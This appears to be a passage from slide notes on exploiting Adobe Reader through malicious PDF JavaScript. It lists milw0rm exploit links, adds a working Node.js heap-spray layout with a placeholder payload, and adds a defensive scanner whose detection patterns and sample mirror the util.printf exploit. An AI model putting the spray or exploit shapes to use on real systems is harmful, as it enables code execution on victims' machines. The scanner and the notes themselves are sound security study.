       Description: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file. The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed, resulting in a stack overflow.
       Failed to uncompress it :(
  • 14. Leveraging Type II
       Play with the bugs when parsing a malformed pdf file. Only use the JavaScript to perform a heap spray.
  • 15. Adobe Acrobat Reader JBIG2 Local Buffer Overflow
       http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.h
       http://milw0rm.com/exploits/8099
       http://milw0rm.com/exploits/8280
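Slide 14 says the Type II exploits use JavaScript only for the heap spray: the parser bug (JBIG2 in the linked PoCs) supplies the control-flow hijack, and the spray makes sure the hijacked pointer lands on attacker data. The Node.js code below is an added example, not from the slides or any of the linked PoCs, of how that spray is laid out; it is plain ECMAScript and so runs under Node just as it would in Acrobat's engine. The block size, the landing address 0x0c0c0c0c and the heap base are conventional values assumed for illustration, and the payload is a constructed placeholder rather than shellcode.

```javascript
// Added example (not from the slides): the heap-spray layout that Type II
// exploits pair with a parser bug. The block size, the landing address
// 0x0c0c0c0c and the heap base are assumed conventional values; the
// "shellcode" is a constructed placeholder, not a real payload.
'use strict';

// Acrobat JS strings are UTF-16, so each %uXXXX escape occupies two bytes
// once the string is in memory. That is why sprays are written with
// unescape() rather than by concatenating single-byte characters.
const NOP_SLED_UNIT = unescape('%u0c0c%u0c0c');      // 0x0c 0x0c = OR AL,0x0c on x86: a harmless sled
const FAKE_SHELLCODE = unescape('%u9090%u9090%ucccc'); // constructed placeholder payload

// Grow the sled to the requested byte length and append the payload, so
// every sprayed block is "sled, then payload" at a predictable size.
function buildSprayBlock(blockBytes, payload) {
  let sled = NOP_SLED_UNIT;
  const sledChars = blockBytes / 2 - payload.length; // 2 bytes per char
  while (sled.length < sledChars) sled += sled;      // the doubling loop every PoC uses
  sled = sled.substring(0, sledChars);
  return sled + payload;
}

// How many blocks of this size must be allocated before the spray covers
// the target address, assuming allocations start near heapBase and are
// contiguous. That is a simplification, but it is the one the technique
// relies on, and why PoCs over-allocate generously.
function blocksToReach(targetAddr, blockBytes, heapBase) {
  return Math.ceil((targetAddr - heapBase) / blockBytes);
}

// Does the target address fall inside a sled rather than inside a payload?
// The block is taken to start exactly at heapBase + k*blockBytes; string
// headers are ignored, another simplification of the same kind.
function landsInSled(targetAddr, blockBytes, heapBase, payload) {
  const offsetInBlock = (targetAddr - heapBase) % blockBytes;
  const sledBytes = blockBytes - payload.length * 2;
  return offsetInBlock < sledBytes;
}

// Perform a spray and keep the blocks alive by returning them. Kept small
// here so it is safe to run anywhere; a real PoC loops until the landing
// address is covered.
function spray(blockCount, blockBytes, payload) {
  const blocks = [];
  for (let i = 0; i < blockCount; i++) blocks.push(buildSprayBlock(blockBytes, payload));
  return blocks;
}

if (typeof require !== 'undefined' && require.main === module) {
  const target = 0x0c0c0c0c, blockBytes = 0x100000, heapBase = 0x00400000;
  console.log('blocks needed:', blocksToReach(target, blockBytes, heapBase));
  console.log('target inside a sled:', landsInSled(target, blockBytes, heapBase, FAKE_SHELLCODE));
  console.log('allocated', spray(4, 0x10000, FAKE_SHELLCODE).length, 'small test blocks');
}
```

The choice of 0x0c0c0c0c is what ties the two halves together: the parser bug overwrites a pointer with bytes the attacker controls, the pointer is made to read 0x0c0c0c0c, and because that address sits inside a sled the same bytes also decode as harmless instructions when execution slides down to the payload.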
  • 16. Leveraging Type III
       Play with the urls. I don't know whether it works in the browser context or pdf reader context..
       - Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Consumption: http://milw0rm.com/exploits/3430
       - Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability: http://milw0rm.com/exploits/3084
       - Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service: http://milw0rm.com/exploits/3040
       - Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit: http://milw0rm.com/exploits/6424
  • 17. To be continued...
       Those I can't RE:
       1 Adobe Acrobat Reader <= 8.1.2 Reader Remote Denial Of Service: http://milw0rm.com/exploits/5687, Overflow?
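With the bugs sorted into Type I (a built-in method called with a crafted argument) and Type II (JavaScript used only to spray before a parser bug fires), a defender can triage a suspicious PDF with a static pass over its JavaScript actions. The Node.js scanner below is an added example, not part of the slides: it pulls /JS strings out of the file, decodes both the literal and the hex string forms, and flags the method names from the exploit list on slide 8 together with the spray idioms of slide 14. The sample document and its scripts are constructed for this example; the second action only mirrors the shape of the public util.printf() PoC (an oversized format width) and carries no payload. Indirect /JS references to stream objects, which may be compressed, are out of scope here.

```javascript
// Added example (not from the slides): static triage of the JavaScript
// actions in a PDF. Flags the Type I method names from the exploit list and
// the heap-spray idioms of Type II. SAMPLE_PDF is constructed for this
// example and contains no payload.
'use strict';

// Methods the slides tie to public exploits (milw0rm 7006/6994, 8595, 8570,
// 8569). Matched case-insensitively against the decoded script text.
const RISKY_CALLS = ['util.printf', 'Collab.getIcon', 'spell.customDictionaryOpen', 'getAnnots'];

// Heap-spray tells: long %u-escaped blobs and the string doubling loop.
const SPRAY_PATTERNS = [
  { name: 'unescape %u blob', re: /unescape\s*\(\s*["'](?:%u[0-9a-f]{4}){8,}/i },
  { name: 'string doubling loop', re: /while\s*\(\s*\w+\.length\s*<\s*0x[0-9a-f]+\s*\)\s*\w+\s*\+=\s*\w+/i },
];

// Decode one PDF string object into script text: literal (...) strings with
// \-escapes (octal, \n, line continuations), or hex <...> strings.
function decodePdfString(raw) {
  if (raw.startsWith('<')) {
    const hex = raw.slice(1, -1).replace(/\s+/g, '');
    return Buffer.from(hex.length % 2 ? hex + '0' : hex, 'hex').toString('latin1');
  }
  return raw.slice(1, -1).replace(/\\(\r\n|\n|\r|[0-7]{1,3}|.)/g, (_, e) => {
    if (/^[0-7]+$/.test(e)) return String.fromCharCode(parseInt(e, 8));
    return { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', '\n': '', '\r': '', '\r\n': '' }[e] ?? e;
  });
}

// Pull every direct /JS value out of the document. Literal strings may nest
// parentheses, so walk them with a depth counter instead of a regex.
function extractJsActions(pdfText) {
  const out = [];
  const re = /\/JS\s*/g;
  let m;
  while ((m = re.exec(pdfText)) !== null) {
    const i = m.index + m[0].length;
    if (pdfText[i] === '<') {
      const end = pdfText.indexOf('>', i);
      if (end !== -1) out.push(decodePdfString(pdfText.slice(i, end + 1)));
    } else if (pdfText[i] === '(') {
      let depth = 0, j = i;
      for (; j < pdfText.length; j++) {
        const c = pdfText[j];
        if (c === '\\') { j++; continue; } // escaped char never changes depth
        if (c === '(') depth++;
        else if (c === ')' && --depth === 0) break;
      }
      out.push(decodePdfString(pdfText.slice(i, j + 1)));
    }
    // "/JS 5 0 R" (an indirect, possibly compressed stream) is not handled here.
  }
  return out;
}

// One finding per (action, risky call) and per (action, spray pattern).
function triage(pdfText) {
  const findings = [];
  extractJsActions(pdfText).forEach((js, idx) => {
    for (const call of RISKY_CALLS)
      if (js.toLowerCase().includes(call.toLowerCase()))
        findings.push({ action: idx, kind: 'risky call', detail: call });
    for (const p of SPRAY_PATTERNS)
      if (p.re.test(js)) findings.push({ action: idx, kind: 'heap spray', detail: p.name });
  });
  return findings;
}

// Constructed sample: a benign action, one shaped like the public
// util.printf() PoC preceded by a spray, and a hex-encoded call.
const SAMPLE_PDF = [
  '4 0 obj << /S /JavaScript /JS (app.alert\\("hello"\\);) >> endobj',
  '5 0 obj << /S /JavaScript /JS (',
  '  var sc = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");',
  '  var nop = unescape("%u0c0c%u0c0c"); while (nop.length < 0x100000) nop += nop;',
  '  var m = []; for (var i = 0; i < 200; i++) m[i] = nop + sc;',
  '  util.printf("%45000f", 0);',
  ') >> endobj',
  '6 0 obj << /S /JavaScript /JS <7574696c2e7072696e746628222229> >> endobj',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_PDF), null, 2));
}
```

Run against a real file by reading it as latin1 text; anything inflated with FlateDecode first needs the streams decompressed (pdftk from slide 6 can rewrite a file uncompressed), which is the same obstacle the getIcon slide runs into. A hit on a risky call is only a lead, since util.printf and getAnnots have legitimate uses; a risky call next to a spray is the combination worth opening in the debugger.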
  • 18. Contents (section 3: Try It Out!)
  • 19. Try it out!
       Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit
       http://milw0rm.com/exploits/7006
       http://milw0rm.com/exploits/6994
  • 20. Contents (section 4: Samples In the Wild)
  • 21. Sample in the wild
       50.2
       hxxp://172.31.25.229/acroPDF.htm
  • 22. Thank you!